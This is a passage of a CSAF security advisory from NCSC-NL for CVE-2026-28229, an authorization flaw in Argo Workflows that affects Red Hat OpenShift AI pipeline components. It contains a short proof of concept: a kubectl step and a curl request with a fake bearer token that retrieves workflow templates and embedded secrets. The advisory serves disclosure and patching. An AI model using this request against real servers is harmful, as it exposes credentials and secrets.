{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-28229",
        "tracking": {
            "current_release_date": "2026-03-26T01:20:41.554317Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-28229",
            "initial_release_date": "2026-03-11T15:52:37.472275Z",
            "revision_history": [
                {
                    "date": "2026-03-11T15:52:37.472275Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-11T15:52:41.964218Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-11T16:28:16.080128Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-11T16:28:19.135328Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T16:39:27.692276Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-11T16:39:29.476593Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-11T17:39:21.071335Z",
                    "number": "7",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-11T21:56:45.732156Z",
                    "number": "8",
                    "summary": "References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-12T15:00:29.290526Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-13T00:28:36.681784Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (15).| Product Identifiers created (1).| References created (3).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-13T00:28:47.230292Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-13T12:05:33.196431Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (2)."
                },
                {
                    "date": "2026-03-13T12:05:35.484381Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:30:44.478359Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:30:46.907374Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:37:57.523703Z",
                    "number": "16",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T18:33:10.554096Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| Product Identifiers created (2).| Products connected (1).| Exploits created (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:33:15.328323Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:34:12.616921Z",
                    "number": "19",
                    "summary": "Products created (1).| Product Identifiers created (1).| Products removed (1)."
                },
                {
                    "date": "2026-03-23T12:06:18.940461Z",
                    "number": "20",
                    "summary": "CVSS updated."
                },
                {
                    "date": "2026-03-23T12:06:27.691408Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:13:52.218509Z",
                    "number": "22",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (2).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:13:53.291811Z",
                    "number": "23",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (5)."
                },
                {
                    "date": "2026-03-25T18:13:54.911202Z",
                    "number": "24",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T21:45:05.434462Z",
                    "number": "25",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (56).| Products created (3).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T21:45:11.373222Z",
                    "number": "26",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "26"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1441104"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-data-science-pipelines-argo-argoexec-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976375"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-data-science-pipelines-argo-argoexec-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1441105"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-data-science-pipelines-argo-workflowcontroller-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976376"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-data-science-pipelines-argo-workflowcontroller-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455889"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-api-server-v2-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976380"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-api-server-v2-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455890"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-driver-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976381"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-driver-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455891"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-launcher-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976382"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-launcher-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455892"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-persistenceagent-v2-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976383"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-persistenceagent-v2-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455893"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-scheduledworkflow-v2-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2976384"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-ml-pipelines-scheduledworkflow-v2-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.7.11",
                                "product": {
                                    "name": "vers:unknown/<3.7.11",
                                    "product_id": "CSAFPID-5795943"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.7.11",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.7.11",
                                    "product_id": "CSAFPID-5907264"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<4.0.2",
                                "product": {
                                    "name": "vers:unknown/>=0|<4.0.2",
                                    "product_id": "CSAFPID-5907265"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=4.0.0|<4.0.2",
                                "product": {
                                    "name": "vers:unknown/>=4.0.0|<4.0.2",
                                    "product_id": "CSAFPID-5795942"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/ui-v3-rc1",
                                "product": {
                                    "name": "vers:unknown/ui-v3-rc1",
                                    "product_id": "CSAFPID-3852467"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0",
                                "product": {
                                    "name": "vers:unknown/v2.0.0",
                                    "product_id": "CSAFPID-3852468"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0-alpha1",
                                "product": {
                                    "name": "vers:unknown/v2.0.0-alpha1",
                                    "product_id": "CSAFPID-3852469"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0-alpha2",
                                "product": {
                                    "name": "vers:unknown/v2.0.0-alpha2",
                                    "product_id": "CSAFPID-3852470"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0-alpha3",
                                "product": {
                                    "name": "vers:unknown/v2.0.0-alpha3",
                                    "product_id": "CSAFPID-3852471"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.0.0-beta1",
                                "product": {
                                    "name": "vers:unknown/v2.0.0-beta1",
                                    "product_id": "CSAFPID-3852472"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.0",
                                "product": {
                                    "name": "vers:unknown/v2.1.0",
                                    "product_id": "CSAFPID-3852473"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.0-alpha1",
                                "product": {
                                    "name": "vers:unknown/v2.1.0-alpha1",
                                    "product_id": "CSAFPID-3852474"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.0-beta1",
                                "product": {
                                    "name": "vers:unknown/v2.1.0-beta1",
                                    "product_id": "CSAFPID-3852475"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.0-beta2",
                                "product": {
                                    "name": "vers:unknown/v2.1.0-beta2",
                                    "product_id": "CSAFPID-3852476"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.1.1",
                                "product": {
                                    "name": "vers:unknown/v2.1.1",
                                    "product_id": "CSAFPID-3852477"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.10.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v2.10.0-rc1",
                                    "product_id": "CSAFPID-3852478"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.0",
                                "product": {
                                    "name": "vers:unknown/v2.2.0",
                                    "product_id": "CSAFPID-3852479"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.2.1",
                                "product": {
                                    "name": "vers:unknown/v2.2.1",
                                    "product_id": "CSAFPID-3852480"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v2.3.0-rc1",
                                    "product_id": "CSAFPID-3852481"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v2.3.0-rc2",
                                    "product_id": "CSAFPID-3852482"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v2.3.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v2.3.0-rc3",
                                    "product_id": "CSAFPID-3852483"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.1.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.1.0-rc1",
                                    "product_id": "CSAFPID-3852484"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.2.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.2.0-rc1",
                                    "product_id": "CSAFPID-3852485"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.2.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.2.0-rc2",
                                    "product_id": "CSAFPID-3852486"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.2.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v3.2.0-rc3",
                                    "product_id": "CSAFPID-3852487"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.2.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v3.2.0-rc4",
                                    "product_id": "CSAFPID-3852488"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc1",
                                    "product_id": "CSAFPID-3852489"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc2",
                                    "product_id": "CSAFPID-3852490"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc3",
                                    "product_id": "CSAFPID-3852491"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc4",
                                    "product_id": "CSAFPID-3852492"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc5",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc5",
                                    "product_id": "CSAFPID-3852493"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc6",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc6",
                                    "product_id": "CSAFPID-3852494"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc7",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc7",
                                    "product_id": "CSAFPID-3852495"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.3.0-rc8",
                                "product": {
                                    "name": "vers:unknown/v3.3.0-rc8",
                                    "product_id": "CSAFPID-3852496"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.4.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.4.0-rc1",
                                    "product_id": "CSAFPID-3852497"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.4.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.4.0-rc2",
                                    "product_id": "CSAFPID-3852498"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.4.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v3.4.0-rc3",
                                    "product_id": "CSAFPID-3852499"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.4.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v3.4.0-rc4",
                                    "product_id": "CSAFPID-3852500"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.5.0",
                                "product": {
                                    "name": "vers:unknown/v3.5.0",
                                    "product_id": "CSAFPID-3852501"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.5.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.5.0-rc1",
                                    "product_id": "CSAFPID-3852502"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.5.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.5.0-rc2",
                                    "product_id": "CSAFPID-3852503"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.6.0",
                                "product": {
                                    "name": "vers:unknown/v3.6.0",
                                    "product_id": "CSAFPID-5050895"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.6.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.6.0-rc1",
                                    "product_id": "CSAFPID-3852504"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.6.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.6.0-rc2",
                                    "product_id": "CSAFPID-5050896"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.6.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v3.6.0-rc3",
                                    "product_id": "CSAFPID-5050897"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.6.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v3.6.0-rc4",
                                    "product_id": "CSAFPID-5050898"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.0",
                                "product": {
                                    "name": "vers:unknown/v3.7.0",
                                    "product_id": "CSAFPID-5050909"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.0-rc1",
                                "product": {
                                    "name": "vers:unknown/v3.7.0-rc1",
                                    "product_id": "CSAFPID-5138379"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.0-rc2",
                                "product": {
                                    "name": "vers:unknown/v3.7.0-rc2",
                                    "product_id": "CSAFPID-5138380"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.0-rc3",
                                "product": {
                                    "name": "vers:unknown/v3.7.0-rc3",
                                    "product_id": "CSAFPID-5138381"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.0-rc4",
                                "product": {
                                    "name": "vers:unknown/v3.7.0-rc4",
                                    "product_id": "CSAFPID-5050910"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.1",
                                "product": {
                                    "name": "vers:unknown/v3.7.1",
                                    "product_id": "CSAFPID-5050911"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.10",
                                "product": {
                                    "name": "vers:unknown/v3.7.10",
                                    "product_id": "CSAFPID-5910332"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.2",
                                "product": {
                                    "name": "vers:unknown/v3.7.2",
                                    "product_id": "CSAFPID-5050912"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.3",
                                "product": {
                                    "name": "vers:unknown/v3.7.3",
                                    "product_id": "CSAFPID-5455332"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.4",
                                "product": {
                                    "name": "vers:unknown/v3.7.4",
                                    "product_id": "CSAFPID-5455333"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.5",
                                "product": {
                                    "name": "vers:unknown/v3.7.5",
                                    "product_id": "CSAFPID-5455334"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.6",
                                "product": {
                                    "name": "vers:unknown/v3.7.6",
                                    "product_id": "CSAFPID-5455335"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.7",
                                "product": {
                                    "name": "vers:unknown/v3.7.7",
                                    "product_id": "CSAFPID-5455336"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.8",
                                "product": {
                                    "name": "vers:unknown/v3.7.8",
                                    "product_id": "CSAFPID-5910333"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v3.7.9",
                                "product": {
                                    "name": "vers:unknown/v3.7.9",
                                    "product_id": "CSAFPID-5910334"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v4.0.0",
                                "product": {
                                    "name": "vers:unknown/v4.0.0",
                                    "product_id": "CSAFPID-5909582"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v4.0.1",
                                "product": {
                                    "name": "vers:unknown/v4.0.1",
                                    "product_id": "CSAFPID-5909583"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "argo-workflows"
                    }
                ],
                "category": "vendor",
                "name": "Argo Project"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.7.11",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.7.11",
                                    "product_id": "CSAFPID-5813179"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=4.0.0|<4.0.2",
                                "product": {
                                    "name": "vers:unknown/>=4.0.0|<4.0.2",
                                    "product_id": "CSAFPID-5813180"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "argo-workflows"
                    }
                ],
                "category": "vendor",
                "name": "Bitnami"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.7.0|<3.7.11",
                                "product": {
                                    "name": "vers:unknown/>=3.7.0|<3.7.11",
                                    "product_id": "CSAFPID-5875116",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=4.0.0|<4.0.2",
                                "product": {
                                    "name": "vers:unknown/>=4.0.0|<4.0.2",
                                    "product_id": "CSAFPID-5838851",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "argo_workflows"
                    }
                ],
                "category": "vendor",
                "name": "argoproj"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-28229",
            "cwe": {
                "id": "CWE-863",
                "name": "Incorrect Authorization"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server’s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n  name: leak-workflow-template\n  namespace: argo\nspec:\n  templates:\n  - name: make-secret\n    resource:\n      action: create\n      manifest: |\n        apiVersion: v1\n        kind: Secret\n        metadata:\n          name: leaked-secret\n        type: Opaque\n        data:\n          password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n> kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n> curl -sk -H \"Authorization: Bearer nothing\" \\\n    \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n  name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n  password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.",
                    "title": "github - https://github.com/advisories/GHSA-56px-hm34-xqj5"
                },
                {
                    "category": "description",
                    "text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 4.0.2 and 3.7.11, Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests. This vulnerability is fixed in 4.0.2 and 3.7.11.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-28229"
                },
                {
                    "category": "description",
                    "text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to 4.0.2 and 3.7.11, Workflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a Authorization: Bearer nothing token can leak sensitive template content, including embedded Secret manifests. This vulnerability is fixed in 4.0.2 and 3.7.11.",
